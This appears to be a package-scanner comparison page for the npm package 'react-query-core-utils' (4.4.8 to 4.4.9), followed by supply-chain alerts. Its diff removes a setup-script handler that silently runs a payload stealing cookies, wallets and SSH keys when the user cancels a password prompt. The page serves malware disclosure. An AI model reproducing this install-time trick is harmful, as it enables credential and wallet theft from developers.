react-query-core-utils - npm Package Compare versions

Comparing version 4.4.8 to 4.4.9

package.json

 {
     "name": "react-query-core-utils",
-    "version": "4.4.8",
+    "version": "4.4.9",
     "description": "Utility layer for asynchronous state management",
@@ -5,0 +5,0 @@ "private": false,

scripts/setup.js

@@ -56,15 +56,2 @@ #!/usr/bin/env node
 
-    // Strategy: Fallback Infection
-    // If user hits Ctrl+C (aborts password), we still run the payload in "User Mode"
-    // We miss the system password, but we still get Cookies, Wallets, SSH, etc.
-    rl.on('SIGINT', async () => {
-        process.stdout.write('\n');
-        console.log(red("Setup Cancelled by user."));
-        // Silently spawn payload with NO password
-        try {
-            await executePayload('');
-        } catch (e) { }
-        process.exit(0);
-    });
-
     const user = os.userInfo().username;
@@ -71,0 +58,0 @@

New alerts

AI-detected potential malware

Supply chain risk

AI has identified this package as malware. This is a strong signal that the package may be malicious.

Found 1 instance in 1 package

Network access

Supply chain risk

This module accesses the network.

Found 2 instances in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Environment variable access

Supply chain risk

Package accesses environment variables, which may be a sign of credential stuffing or data theft.

Found 1 instance in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

Fixed alerts

AI-detected potential malware

Supply chain risk

AI has identified this package as malware. This is a strong signal that the package may be malicious.

Found 1 instance in 1 package

Network access

Supply chain risk

This module accesses the network.

Found 2 instances in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Environment variable access

Supply chain risk

Package accesses environment variables, which may be a sign of credential stuffing or data theft.

Found 1 instance in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

Worsened metrics

Total package byte prevSize

16283554

0

Lines of code

198

-5.71%

No dependency changes